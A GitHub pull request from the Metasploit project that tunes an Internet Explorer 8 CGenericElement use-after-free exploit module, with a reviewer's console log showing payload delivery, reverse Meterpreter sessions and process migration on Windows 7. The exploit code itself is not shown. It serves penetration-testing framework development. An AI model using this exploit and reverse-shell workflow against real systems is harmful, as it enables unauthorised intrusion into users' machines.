
Modifies the exploit a little for better stability #1891

Merged

Conversation

wchen-r7
Contributor

@wchen-r7 wchen-r7 commented Jun 2, 2013

Without this patch, it looks like the 1st attempt tends to fail first, but then IE recovers from the crash, and then that's how we get a shell.

This patch makes sure the LFH is enabled before the CGenericElement object is created. Trigger is also modified a little. Seems better.

Tested on XP SP3 + IE 8 and Win 7 + IE8

This patch makes sure the LFH is enabled before the CGenericElement
object is created. Trigger is also modified a little.
@jvazquez-r7
Contributor

Working well on W7:

msf exploit(ie_cgenericelement_uaf) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/83DEnFa1gimQTr4
[*]  Local IP: http://10.6.0.165:8080/83DEnFa1gimQTr4
[*] Server started.
msf exploit(ie_cgenericelement_uaf) > [*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /83DEnFa1gimQTr4
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:52911) at 2013-06-03 15:32:38 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:52911) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (580)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3148
[+] Successfully migrated to process 
[*] 192.168.172.196 - Meterpreter session 1 closed.  Reason: Died
[*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /83DEnFa1gimQTr4
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:52925) at 2013-06-03 15:33:02 -0500
[*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:52925) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2588)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 744
[+] Successfully migrated to process 
[*] 192.168.172.196 - Meterpreter session 2 closed.  Reason: Died
[*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /83DEnFa1gimQTr4
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:52940) at 2013-06-03 15:33:23 -0500
[*] Session ID 3 (10.6.0.165:4444 -> 10.6.0.165:52940) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2516)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2072
[+] Successfully migrated to process 


The only retry was not due to the trigger but probably to the heap being busted, which is not frequent, just something we have to deal with when working with heap exploits :)

@jvazquez-r7 jvazquez-r7 merged commit cc951e3 into rapid7:master Jun 3, 2013
@wchen-r7 wchen-r7 deleted the cgenericelement_uaf_trigger_update branch August 22, 2016 16:22